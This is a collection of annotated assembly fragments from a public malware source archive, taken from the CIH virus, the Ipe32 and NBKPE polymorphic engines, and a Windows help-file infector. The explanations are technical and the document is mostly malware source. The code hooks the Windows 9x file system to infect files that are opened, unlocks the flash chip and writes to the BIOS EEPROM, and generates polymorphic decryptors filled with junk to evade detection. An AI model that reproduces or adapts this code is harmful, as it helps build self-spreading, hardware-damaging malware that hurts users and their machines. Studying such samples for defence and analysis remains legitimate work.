### IFSMgr_InstallFileSystemApiHook Entry Point

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/MSDOS/C-Index/Virus.MSDOS.Unknown.cih.txt

Replacement for the IFSMgr_InstallFileSystemApiHook service entry, which the installer below patches into the IFSMgr service table. Whenever another driver installs a file-system API hook, this routine first removes the virus's own hook, calls the genuine service once for the caller's hook, then calls it again for the virus's hook. The virus's hook is therefore always the most recently installed one, i.e. first in the chain, no matter who installs later. The address of the hook that now sits behind it is kept in DR0 (the CIH code uses debug register 0 as a spare global).

```assembly
InstallFileSystemApiHook:
        push    ebx
        call    @4                      ; delta-offset trick:
@4:                                     ;
        pop     ebx                     ; mov ebx, offset FileSystemApiHook
        add     ebx, FileSystemApiHook-@4
                                        ;
        push    ebx
        int     20h                     ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $
        dd      00400068h               ; VxD 0040h (IFSMgr), service 0068h
                                        ; Use EAX, ECX, EDX, and flags
        pop     eax

        ; Call Original IFSMgr_InstallFileSystemApiHook
        ; to Link Client FileSystemApiHook
        push    dword ptr [esp+8]
        call    OldInstallFileSystemApiHook-@3[ebx]
        pop     ecx
        push    eax

        ; Call Original IFSMgr_InstallFileSystemApiHook
        ; to Link My FileSystemApiHook
        push    ebx
        call    OldInstallFileSystemApiHook-@3[ebx]
        pop     ecx
        mov     dr0, eax                ; Adjust OldFileSystemApiHook Address
        pop     eax
        pop     ebx
        ret
```

--------------------------------

### Install File System API Hook

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/MSDOS/C-Index/Virus.MSDOS.Unknown.cih.txt

Installs the virus's hook through IFSMgr_InstallFileSystemApiHook and keeps the previous hook address in DR0. It then reads the dword operand at its own `int 20h` call site: once the VMM's dynamic linker has resolved that call, the operand holds the address of the IFSMgr service-table entry, so the code saves the genuine entry point in OldInstallFileSystemApiHook and writes its own InstallFileSystemApiHook (above) into the table.
```assembly
InstallMyFileSystemApiHook:
        lea     eax, FileSystemApiHook-@6[edi]
        push    eax
        int     20h                     ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $
        dd      00400067h               ; VxD 0040h (IFSMgr), service 0067h
                                        ; Use EAX, ECX, EDX, and flags
        mov     dr0, eax                ; Save OldFileSystemApiHook Address
        pop     eax                     ; EAX = FileSystemApiHook Address

        ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
        mov     ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]  ; operand of the patched call site
        mov     edx, [ecx]                                    ; = service-table entry
        mov     OldInstallFileSystemApiHook-@3[eax], edx

        ; Modify IFSMgr_InstallFileSystemApiHook Entry Point
        lea     eax, InstallFileSystemApiHook-@3[eax]
        mov     [ecx], eax
        cli
        jmp     ExitRing0Init
```

--------------------------------

### Get Parameter Procedure

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

A placeholder procedure for getting parameters; it currently does nothing.

```assembly
iGetPar proc
        ret
iGetPar endp
```

--------------------------------

### IFSMgr_FileSystemHook Entry Point

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/MSDOS/C-Index/Virus.MSDOS.Unknown.cih.txt

Entry point of the virus's FileSystemApiHook. After `pushad` (20h bytes) and the return address (4 bytes) the hook's arguments start at [esp+24h]; the second argument, at [esp+28h], is the IFS function number, and 24h is IFSFN_OPEN, so only file-open requests are inspected. If the OnBusy flag is already set (the hook is being re-entered by its own file I/O) the request goes straight to the function pointer pIFSFunc; anything that is not an open goes to the previous hook.

```assembly
FileSystemApiHook:
@3 = FileSystemApiHook
        pushad
        call    @5                      ; delta-offset trick:
@5:                                     ;
        pop     esi                     ; mov esi, offset VirusGameDataStartAddress
        add     esi, VirusGameDataStartAddress-@5

        ; *************************************
        ; *            Is OnBusy !?           *
        ; *************************************
        test    byte ptr (OnBusy-@6)[esi], 01h  ; if ( OnBusy )
        jnz     pIFSFunc                        ;   goto pIFSFunc

        ; *************************************
        ; *           Is OpenFile !?          *
        ; *************************************
        ; if ( NotOpenFile )
        ;   goto prevhook
        lea     ebx, [esp+20h+04h+04h]          ; EBX -> FunctionNum argument
        cmp     dword ptr [ebx], 00000024h      ; IFSFN_OPEN
        jne     prevhook

        ; *************************************
        ; *           Enable OnBusy           *
        ; *************************************
```

--------------------------------

### EDI Offset Initialization

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.NBKPE.txt

Emits the first instruction of the NBKPE decryptor, `mov edi, imm32` (opcode 0BFh), into the buffer at EDI and records the position of its immediate in _off2; the immediate is written as zero here and patched with the runtime offset of the encrypted body once the decryptor size is known (see the CRYPT procedure further down).

```assembly
;*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*
; EDI_OFFSET                    *
;*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*
;
edi_ofs proc                            ;
        push    eax                     ;
        mov     al,0BFH                 ; opcode: mov edi, imm32
        stosb                           ;
        mov     [ebp+_off2],edi         ; remember where the imm32 goes
                                        ; mov edi,offset virus
        xor     eax,eax                 ;
        stosd                           ; placeholder imm32, patched later
        pop     eax                     ;
        ret                             ;
edi_ofs endp                            ;
```

--------------------------------

### Get Random Junk Memory Operand (tail of gm_meth2)

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

Tail of gm_meth2; its head, which leaves 4*JunkSpSize-3 in EAX, is part of the iGetMemory listing further down. rnd32r picks a byte offset at which a whole dword still fits inside the junk area, and adding JunkSpRVA turns it into an absolute address, returned in ESI with CX = MOD_DIRECT (a [disp32] operand).

```assembly
        dec     eax
        push    eax
        call    rnd32r                  ; random offset into junk memory
        add     eax, [ebp.JunkSpRVA-idelta]     ; add start rva
        xchg    eax, esi
        mov     cx, MOD_DIRECT          ; return a direct address
        ret
```

--------------------------------

### Get Encrypted Data (Method 4)

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

Returns an operand for the first encrypted dword at DecryptRVA in scaled-index form: rnd32r(3) picks a scale exponent CL of 0, 1 or 2 (scale 1, 2 or 4), the displacement in ESI is lowered by 2^CL, and CH is packed from the scale (shifted left by 3) and the register code in `creg`, which ciCreateOperand (not on this page) turns into the SIB byte; CL returns MOD_DIRECT.
```assembly
        mov     esi, [ebp.DecryptRVA-idelta]
        push    03h                     ; scaling factor 1, 2 or 4
        call    rnd32r
        mov     ecx, eax
        push    edx
        xor     edx, edx
        inc     edx
        shl     edx, cl                 ; EDX = 1 << CL
        sub     esi, edx                ; lower the displacement by the scale
        pop     edx
        shl     eax, 03h                ; scale field
        xor     al, [ebp.creg-idelta]   ; plus the index register
        mov     ch, al
        mov     cl, MOD_DIRECT
        ret
```

--------------------------------

### Get Random Encrypted Data (Method 3)

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

Returns a [disp32] operand pointing at a random byte offset inside the encrypted area, chosen from the 4*CryptSize-3 positions at which a whole dword still fits; the offset is added to DecryptRVA and returned in ESI with CX = MOD_DIRECT.

```assembly
        mov     eax, [ebp.CryptSize-idelta]
        shl     eax, 02h                ; size in bytes
        dec     eax
        dec     eax
        dec     eax                     ; last offset at which a dword still fits
        push    eax
        call    rnd32r
        add     eax, [ebp.DecryptRVA-idelta]
        xchg    eax, esi
        mov     cx, MOD_DIRECT
        ret
```

--------------------------------

### Get File Attributes using IFSMgr_Ring0_FileIO

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/MSDOS/C-Index/Virus.MSDOS.Unknown.cih.txt

Calls IFSMgr_Ring0_FileIO with AX = 4300h (R0_GETFILEATTRIBUTES) for the file whose open request the hook intercepted. The service sets the carry flag on failure, in which case the hook clears its busy flag and leaves the file alone.

```assembly
        ; *************************************
        ; *     Get Attributes of the File    *
        ; *************************************
        mov     ax, 4300h               ; R0_GETFILEATTRIBUTES
        int     20h                     ; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO = $
        dd      00400032h               ; VxD 0040h (IFSMgr), service 0032h
        jc      DisableOnBusy           ; error: give up on this file
```

--------------------------------

### Junk Block Generation Entry Point

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

Main entry for generating one junk block. BL names a register the junk must not touch (8, the default, matches no register). Unless junk is disabled (nojunk), a method is picked at random from the BJ_BLOCKCNT entries of bj_blockz and relocated with EBP, a junk register is drawn until it differs from BL, and the method is called with that register in EAX. `mov [esp], edi` overwrites the EDI slot that pushad saved, so popad restores every register except the advanced output pointer.
```assembly
; main procedure: generate 1 junk block
iBlockJunk proc
        mov     bl, 08h                 ; no register to avoid
iBlockJunkAR:                           ; avoid register in ebx
        test    byte ptr [ebp.nojunk-idelta], 0FFh
        jz      bj_sueder
        ret
bj_sueder:
        pushad
        push    BJ_BLOCKCNT             ; choose between multiple methods
        call    rnd32r
        mov     edx, [ebp.bj_blockz-idelta+4*eax]   ; get address of
        add     edx, ebp                            ; method procedure & relocate
bj_nxtr:
        call    iGetJunkReg             ; get a junk reg
        cmp     al, bl                  ; test if we shouldn't touch it
        je      bj_nxtr                 ; yes, get another junk reg
        xchg    ebx, eax                ; junk reg in EAX
        call    edx                     ; execute method
        mov     [esp], edi              ; return the advanced EDI through popad
        popad
        ret
```

--------------------------------

### Get IFSMgr_Ring0_FileIO Address

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/MSDOS/C-Index/Virus.MSDOS.Unknown.cih.txt

Reads the dword operand of the patched `int 20h` site (after dynamic linking it holds the address of the service-table entry) and dereferences it once more to obtain the IFSMgr_Ring0_FileIO entry point. Later code calls the service through EDI instead of re-issuing the `int 20h`.

```assembly
        ; *************************************
        ; *   Get IFSMgr_Ring0_FileIO Address *
        ; *************************************
        mov     edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]   ; service-table entry
        mov     edi, [edi]                                     ; entry point
```

--------------------------------

### Generate Junk Register and Clear

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

Draws a random register number (rnd32 masked to 0..7 with REG_EDI), rejects ESP, emits code that clears the register via gClearReg and leaves its code in ECX. The isj_ prefix marks this as part of the SEH-jump generator (iSEHJump).

```assembly
isj_npd0:
        call    rnd32
        and     al, REG_EDI             ; 0..7
        cmp     al, REG_ESP
        je      isj_npd0                ; never ESP
        mov     ebx, eax
        call    gClearReg               ; emit code that zeroes the register
        xchg    eax, ecx
```

--------------------------------

### HLP File - Locate and Prepare System Directory

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Win32/Infector/WinHLP.Pluma.txt

Having found the |SYSTEM name in the directory, the code skips the 8-byte zstring, swaps the directory entry's offset with the current file size (the modified |SYSTEM copy will be appended at the end of the file) and converts the old offset into a pointer: EDX = start of the original |SYSTEM internal file (its file header), EDI = the data behind that header.

```assembly
foundSystemDir:
        ; as i only infect non-indexed hlp files, i'm sure the
        ; data that follows the |SYSTEM zstring is the offset of
        ; the directory.
        ; 1st skip the zstring
        add     edi,8
        ; now goto to the directory (offset from hlp header)
        ; and set the new system directory at the end of file
        mov     esi,dword ptr [fileSize+ebp]
        xchg    esi, dword ptr [edi]    ; entry now points at EOF; ESI = old offset
        mov     edi,esi
        add     edi,eax                 ; EAX = base of the mapped file
        ; save begin of this file
        mov     edx,edi
        add     edi,size HLPFILEHEADER
```

--------------------------------

### Indirect Get Memory Call

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

Picks the operand method for a memory write. Because rnd32r(GM_METHCNT3 - 1) is rnd32r(1) = 0 and the table is indexed from its second entry, this always selects gm_meth2 (junk space): a write must never land on the procedure parameters.

```assembly
iGetWrMem proc
        push    eax
        push    GM_METHCNT3 - 1         ; = 1, so rnd32r always returns 0
        call    rnd32r
        mov     eax, [ebp.gm_methods-idelta+4+4*eax]   ; second entry: gm_meth2
        add     eax, ebp
        call    eax
        pop     eax
        ret
iGetWrMem endp
```

--------------------------------

### Procedure Entry Point Generation (Win32 Assembly)

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

Body of the procedure-generator loop. A procedure without parameters gets no frame; otherwise the generator chooses between `ENTER 0,0` (bit 0 of DH set) and `PUSH EBP / MOV EBP,ESP`, stored as a dword and backed up one byte since only 3 bytes are wanted. Junk is inserted, then either one of the real decryptor generators from Generatorz or, for indices at or above JUNK_PROC, only junk, and finally a matching epilogue: `POP EBP` or `LEAVE`, followed by `RET imm16` (C2h, imm16 = 4 * parameter count, which the `shl eax, 0Ah` produces in AH) or a plain `RET` (C3h).

```assembly
        mov     dl, [ebp.ProcParameters-idelta+ebx]
        test    dl, dl                  ; if no parameter,
        jz      gp_np_entry             ; generate no entry
        ; if procedure has parameters we need to set up EBP
        ; choose between two (similar) entrys:
        ; ENTER 0000h,00h
        ; or
        ; PUSH EBP
        ; MOV EBP, ESP
        test    dh, 01h
        jz      gp_psh_entry
        xor     eax, eax                ; no local variables
        mov     al, PROC_ENTER          ; opcode for enter
        stosd                           ; store instruction
        jmp     gp_np_entry
gp_psh_entry:
        mov     eax, PUSH_REG or REG_EBP or (100h * MOV_EBP_ESP)
        stosd
        dec     edi                     ; wrote 3 bytes
gp_np_entry:
        push    ebx
        call    iProcJunk
        pop     ebx
        cmp     ebx, JUNK_PROC
        jnb     gp_junk_proc
        mov     esi, [ebp.Generatorz-idelta+ebx*4]
        add     esi, ebp
        push    edx
        call    esi                     ; call di generator
        pop     edx
gp_junk_proc:
        call    iProcJunk               ; make some junk
        mov     eax, edx
        xor     ah, ah
        shl     eax, 08h xor 02h        ; shift left one byte + * 4
        xor     al, PROC_RETP           ; generate ret (with params)
        test    ah, ah                  ; do we have parameters?
        jz      gp_no_par
        mov     byte ptr [edi], POP_REG or REG_EBP
        test    dh, 01h
        jz      gp_psh_exit
        xor     byte ptr [edi], PROC_LEAVE xor (POP_REG or REG_EBP)
gp_psh_exit:
        inc     edi                     ; write pop ebp/leave
        stosd                           ; store RET opcode (C2h)
        dec     edi                     ; only store 3 bytes
        jmp     gp_par
gp_no_par:
        inc     eax
        stosb                           ; store RET opcode (C3h)
gp_par:
        call    WriteJunk
        pop     ebx
        inc     ebx                     ; increment count
        pop     ecx
        loop    gp_loop
        ret
iGenProcs endp
```

--------------------------------

### Enable EEPROM Write Routine (Assembly)

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/MSDOS/C-Index/Virus.MSDOS.Unknown.cih.txt

Writes the flash chip's software command sequence through memory-mapped accesses: the caller supplies two addresses in EAX and ECX and the bytes to write in AL and CL, and the write of 80h in the middle is the command that puts the chip into its programming mode. This is the step that makes CIH's BIOS corruption possible; the routine itself writes no data.

```assembly
; ***************************
; * Enable EEPROM to Write  *
; ***************************
EnableEEPROMToWrite:
        mov     [eax], cl
        mov     [ecx], al
        mov     byte ptr [eax], 80h
        mov     [eax], cl
        mov     [ecx], al
        ret
```

--------------------------------

### iInit Procedure for Poly Engine Initialization

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

Initialization of the ind00r polymorphic engine. EBP is derived from the return address left by `call iInit` (the ind00r_delta label), so all engine data is addressed as [ebp.field-idelta]. The random seed is reset from RandomConst, the five caller parameters (junk space size and address, decrypt RVA, code size and address) are stored into InitValues, the register assignment is shuffled with MixBytes, and the number and order of the junk procedures are randomized.
```assembly
; main procedure: init
iInit proc
        ; first of all, calculate new delta offset
        mov     ebp, [esp]              ; return address = ind00r_delta at run time
        add     ebp, idelta - offset ind00r_delta   ; calculate delta
                                                    ; offset
        ; now init random seed
        push    dword ptr [ebp.RandomConst-idelta]
        pop     dword ptr [ebp.RandomSeed-idelta]
        push    edi                     ; push destination index
        lea     edi, [ebp.InitValues-idelta]        ; table with init values
        ; let's store parameterz
        stosd                           ; store size of junk space
        xchg    eax, edx
        stosd                           ; store address of junk space
        xchg    eax, ebx
        stosd                           ; store decrypt rva
        xchg    eax, ecx
        stosd                           ; size of code
        xchg    eax, esi
        stosd                           ; address of code
        ; mix the registers
        lea     esi, [ebp.preg-idelta]
        push    USED_REGS
        call    MixBytes
        ; get number of junk procedures (1 - 5)
        push    JUNK_PROCS              ; 0 - 3
        call    rnd32r
        add     al, MIN_PROCS
        mov     [ebp.ProcCount-idelta], al          ; number of procedures
        ; put the procedures in random order
        lea     esi, [ebp.ProcedureOrder-idelta]
        push    eax
        call    MixBytes
```

--------------------------------

### Get Current Encrypted Dword (Method 5)

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

Returns the dword currently addressed by the pointer register: CX receives the register code stored in `preg` (a register-form operand) and ESI is zero, i.e. no displacement.

```assembly
        movsx   cx, byte ptr [ebp.preg-idelta]      ; use [preg] without
        xor     esi, esi                            ; displacement
        ret
```

--------------------------------

### Get Random Junk Register

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

Returns one of the three junk-register codes stored in the junkreg1 array (index rnd32r(3)), zero-extended into EAX.

```assembly
iGetJunkReg proc
        push    03h
        call    rnd32r
        movzx   eax, byte ptr [ebp.junkreg1-idelta+eax]
        ret
iGetJunkReg endp
```

--------------------------------

### Ring3 Virus Game Initial Program

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/MSDOS/C-Index/Virus.MSDOS.Unknown.cih.txt

Assembly code for the initial entry point of the Ring3 part of the virus.
It saves EBP, then hangs a fake EXCEPTION_REGISTRATION record off fs:[0]: `lea eax,[esp-8]` / `xchg eax, fs:[ebx]` (EBX = 0) makes the SEH chain head point just below the stack pointer, so the record's two slots lie at [esp-8] and [esp-4]; subsequent pushes, not shown here, fill them with the previous chain head (returned in EAX by the xchg) and the virus's handler address. Any exception raised by the ring-0 tricks that follow (they fault on NT, as the comment alludes to) therefore lands in the virus's own handler instead of terminating the host. The `call @0` / `pop ebx` pair also yields the delta offset used to address the virus's data.

```assembly
VirusGame SEGMENT
        ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
        ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame

; *****************************************
; *    Ring3 Virus Game Initial Program   *
; *****************************************
MyVirusStart:
        push    ebp

        ; *************************************
        ; * Let's Modify Structured Exception *
        ; * Handing, Prevent Exception Error  *
        ; * Occurrence, Especially in NT.     *
        ; *************************************
        lea     eax, [esp-04h*2]        ; fake EXCEPTION_REGISTRATION below ESP
        xor     ebx, ebx
        xchg    eax, fs:[ebx]           ; fs:[0] = new head, EAX = old head
        call    @0
@0:
        pop     ebx                     ; EBX = delta offset
```

--------------------------------

### Push Method Table Initialization

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

Dispatch table (offsets relative to idelta) for the five junk-push methods used by iPushJunk. pp_meth4 appears twice, so it is picked twice as often as the others.

```assembly
pp_methods equ $
        dd      offset pp_meth1 - idelta
        dd      offset pp_meth2 - idelta
        dd      offset pp_meth3 - idelta
        dd      offset pp_meth4 - idelta
        dd      offset pp_meth4 - idelta
PP_METHCNT equ 05h
```

--------------------------------

### Open File using IFSMgr_Ring0_FileIO

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/MSDOS/C-Index/Virus.MSDOS.Unknown.cih.txt

Opens the intercepted file through IFSMgr_Ring0_FileIO, called via the entry point cached in EDI: AX = D500h (R0_OPENCREATFILE), ECX = 0 (attributes), EDX = 1 (action: open an existing file), EBX = 2 (read/write access); the path pointer is set up before this point. The handle comes back in EAX and is moved to EBX.
```assembly
; *************************************
; *             Open File             *
; *************************************
OpenFile:
        xor     eax, eax
        mov     ah, 0d5h                ; AX = D500h: R0_OPENCREATFILE
        xor     ecx, ecx                ; attributes = 0
        xor     edx, edx
        inc     edx                     ; action = 1: open existing file
        mov     ebx, edx
        inc     ebx                     ; access = 2: read/write
        call    edi                     ; VXDCall IFSMgr_Ring0_FileIO
        xchg    ebx, eax                ; mov ebx, FileHandle
```

--------------------------------

### Store MOD/RM Byte and Exit

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

Closing steps of the opcode/operand generator: the MOD/RM byte built in EBX is stored, then `mov [esp], edi` patches the EDI slot of the pushad frame so that popad returns every register unchanged except the advanced output pointer.

```assembly
        xchg    eax, ebx                ; MOD/RM byte
        stosb                           ; store
gcr_exit:
        mov     [esp], edi              ; return EDI through popad
        popad
        ret
```

--------------------------------

### Main Junk Generation Procedure

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

Emits a run of junk blocks: rnd32r(3) yields 0..2, plus one gives 1..3 blocks, each generated by iBlockJunk; `loop $-5` jumps back over the 5-byte call. The caller's counter is preserved around the loop.

```assembly
iProcJunk proc
        push    ecx                     ; preserve counter
        push    03h                     ; get random number between 0 and 2
        call    rnd32r
        inc     eax                     ; add 1 (1 - 3)
        xchg    eax, ecx                ; load into counter
        call    iBlockJunk              ; generate junk blocks
        loop    $ - 05h                 ; back to the call
        pop     ecx                     ; restore counter
        ret
iProcJunk endp
```

--------------------------------

### FPU Instruction Execution and Operand Creation

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

Two fragments of the FPU junk generator. The first emits an FPU load (FPU_LOAD) in a random word/integer size variant; the second picks a writable memory operand with iGetWrMem, emits the matching store (FPU_STORE) and then a random register junk instruction. ciCreateOperand builds the ModRM/SIB bytes for the operand selected in CL/CH/ESI.
```assembly
        call    rnd32
        and     al, FPU_WORD_LDST       ; random size bits
        or      al, FPU_INT_LDST        ; integer load
        mov     bl, FPU_LOAD
        stosb
        call    ciCreateOperand
```

```assembly
        call    iGetWrMem               ; operand we are allowed to write
        call    rnd32
        and     al, FPU_WORD_LDST xor FPU_INT_LDST
        xor     al, FPU_INT_LDST
        mov     bl, FPU_STORE
        stosb
        call    ciCreateOperand
        call    iRndRegJ
```

--------------------------------

### FPU Method gf_meth3 Implementation

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

FPU method 3: loads ln 2 (FPU_LDLN2), inserts a junk block, emits FSQRT, then a qword multiply with ST(1) built by ciCreateOperand, and finally a dword load/store form with a fixed ModRM. Like the other gf_ methods it produces plausible but meaningless FPU traffic.

```assembly
gf_meth3:
        mov     ax, FPU_LDLN2
        stosw
        call    iBlockJunk
        mov     ax, FPU_SQRT
        stosw
        mov     al, FPU_QWORD_OP
        stosb
        mov     bl, FPU_MUL
        mov     cl, REG_ST1 or MOD_REG
        call    ciCreateOperand
        mov     ax, FPU_DWORD_LDST or (100h * (MOD_REG xor 09h))
        stosw
        ret
```

--------------------------------

### Get Random Memory Operand (Assembly)

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

Returns a random memory operand, either a procedure parameter or junk memory. Before the DECRYPT_DATA procedure only the first GM_METHCNT2 (3) methods are allowed; from there on all GM_METHCNT1 (5) are. Subtracting and re-adding InLoop excludes method 1 (EBP-relative parameters) while the main loop, which has no EBP frame, is being generated.
```assembly
iGetMemory proc
        push    eax
gm_rep:
        xor     eax, eax
        mov     al, GM_METHCNT2
        cmp     byte ptr [ebp.CurrentProc-idelta], DECRYPT_DATA
        jb      gm_push
        inc     eax
        inc     eax                     ; all GM_METHCNT1 methods
gm_push:
        sub     al, [ebp.InLoop-idelta]
        push    eax
        call    rnd32r
        add     al, [ebp.InLoop-idelta]  ; skip method 1 inside the loop
        mov     eax, [ebp.gm_methods-idelta+4*eax]
        add     eax, ebp
        call    eax
        pop     eax
        ret

; get random parameter
gm_meth1:
        movzx   eax, byte ptr [ebp.CurrentProc-idelta]
        mov     al, [ebp.ProcParameters-idelta+eax]   ; parameter count
        test    eax, eax
        jz      gm_m1_ebp               ; if no parameter, don't use this method
        push    eax
        call    rnd32r                  ; choose random parameter
        shl     eax, 02h                ; scale to dword
        add     al, 08h                 ; first dword is return address
        mov     esi, eax                ; the displacement
        mov     cx, REG_EBP             ; relative to EBP
        ret
gm_m1_ebp:
        mov     cl, REG_EBP xor MOD_REG
        ret

; get random junk mem
gm_meth2:
        mov     eax, [ebp.JunkSpSize-idelta]        ; access a random dword
        shl     eax, 02h
        dec     eax
        dec     eax
```

--------------------------------

### HLP File - Copy System Directory and Macro

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Win32/Infector/WinHLP.Pluma.txt

Copies the original |SYSTEM internal file into the VirtualAlloc'd buffer: EDX still points at its file header, whose first dword (the reserved size) gives the byte count for `rep movsb`. The macro generation that follows appends the virus's own record to this copy.

```assembly
        ; copy system directory plus our macro to the buffer
        ; 1st old system
        mov     edi,dword ptr [mHnd+ebp]
        mov     esi,edx
        mov     ecx,dword ptr [edx]     ; size from the file header
        rep     movsb
        ; begin 'our macro' generation
```

--------------------------------

### EEPROM I/O Routine (Assembly)

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/MSDOS/C-Index/Virus.MSDOS.Unknown.cih.txt

Port-I/O read-modify-write of a chipset register: EDI (the register address) is written as a dword to the port in EBP, a byte is read from the port in EDX and ORed with a mask (the `or al,44h` operand sits under the BooleanCalculateCode label and is patched elsewhere), the address is written again and the modified byte written back. This is how CIH unlocks the flash region before the EEPROM write routine runs.
```assembly
; ***************************
; *       IO for EEPROM     *
; ***************************
IOForEEPROM:
@10 = IOForEEPROM
        xchg    eax, edi                ; EAX = register address
        xchg    edx, ebp                ; EDX = address port
        out     dx, eax
        xchg    eax, edi
        xchg    edx, ebp
        in      al, dx                  ; read the current byte from the data port
BooleanCalculateCode = $
        or      al, 44h                 ; mask is patched at run time
        xchg    eax, edi
        xchg    edx, ebp
        out     dx, eax                 ; select the register again
        xchg    eax, edi
        xchg    edx, ebp
        out     dx, al                  ; write the modified byte back
        ret
```

--------------------------------

### FPU Method gf_meth1 Implementation

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

FPU method 1: with probability 1/2 loads pi (FPU_LDPI) and, after a junk block, emits a word-sized multiply-and-pop with ST(1); otherwise loads log10 2 (FPU_LDLG2) and emits a divide-and-pop. Both tails go through ciCreateOperand.

```assembly
gf_meth1:
        call    rnd32
        and     al, 01h
        jz      gf_meth11
        mov     ax, FPU_LDPI
        stosw
        call    iBlockJunk
        mov     al, FPU_WORD_OP
        stosb
        mov     bl, FPU_MULP
gf_meth1e:
        mov     cl, REG_ST1 or MOD_REG
        jmp     ciCreateOperand
gf_meth11:
        mov     ax, FPU_LDLG2
        stosw
        call    iBlockJunk
        mov     al, FPU_WORD_OP
        stosb
        mov     bl, FPU_DIVP
        jmp     gf_meth1e
```

--------------------------------

### Push Junk Procedure

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

Pushes a junk parameter: chooses one of the PP_METHCNT methods from pp_methods, relocates it with EBP and calls it. The pushad / `mov [esp], edi` / popad idiom hands back only the advanced output pointer.

```assembly
iPushJunk proc
        pushad
        push    PP_METHCNT              ; random method to push
        call    rnd32r                  ; a parameter
        mov     eax, [ebp.pp_methods-idelta+4*eax]
        add     eax, ebp
        call    eax                     ; call da method
        mov     [esp], edi              ; return EDI through popad
        popad
        ret
```

--------------------------------

### Method 1: MOV REG, IMM32

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

Method 1 of the load-register generator: `MOV reg, imm32`. The register code arrives in EBX and is XORed into the B8h base opcode (B8h + reg), which is stored; then the immediate in EDX is stored as a dword.
```assembly
; method 1: mov reg, imm
glr_meth1:
        xchg    eax, ebx                ; get register
        xor     al, MOV_REG_IMM32       ; add opcode (B8h + reg)
        stosb                           ; store opcode
        xchg    eax, edx                ; get immediate
        stosd                           ; store immediate
        ret
```

--------------------------------

### RVA Manipulation and SEH Initialization

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.NBKPE.txt

Tail of NBKPE's SEH generator: the target address is computed as _RVA plus the two distances computed just before (EDX and EAX, see the fragment further down) plus 3, and patched into the dword at off1. EDI, the output pointer, is carried across popad through DR0 (a privileged instruction, so this only works at ring 0). The variable block that follows holds the generator's state: SEH and decryptor offsets, the register used for zeroing (xor_reg), the RVA, and the virus length and offset.

```assembly
        mov     ebx,[ebp+_RVA]          ;
        add     ebx,edx                 ; + (ini_SEH - all_ini)
        add     ebx,eax                 ; + (off6 - off1)
        add     ebx,3                   ;
                                        ;
        mov     eax,[ebp+ofs off1]      ;
        mov     [eax],ebx               ; patch the target address
                                        ;
        mov     dr0,edi                 ; keep the output pointer across popad
        popad                           ;
        mov     edi,dr0                 ;
        ret                             ;
                                        ;
ini_SEH dd 0                            ;
;wahoo  dd 0                            ;
;siz    dd 0                            ;
off1    dd 0                            ;
off6    dd 0                            ;
all_ini dd 0                            ;
xor_reg db 0                            ;
_RVA    dd 0                            ;
len     dd 0                            ;
ofsvir  dd 0                            ;
                                        ;
SEH endp                                ;
```

--------------------------------

### FPU Method gf_meth2 Implementation

Source: https://github.com/vxunderground/malwaresourcecode/blob/main/Engines/Win32/Virus.Win32.Ipe32.txt

FPU method 2: loads log2 10 (FPU_LDL2T), inserts a junk block and emits a dword multiply with ST(1) through ciCreateOperand.

```assembly
gf_meth2:
        mov     ax, FPU_LDL2T
        stosw
        call    iBlockJunk
        mov     al, FPU_DWORD_OP
        stosb
        mov     bl, FPU_MUL
        mov     cl, REG_ST1 or MOD_REG
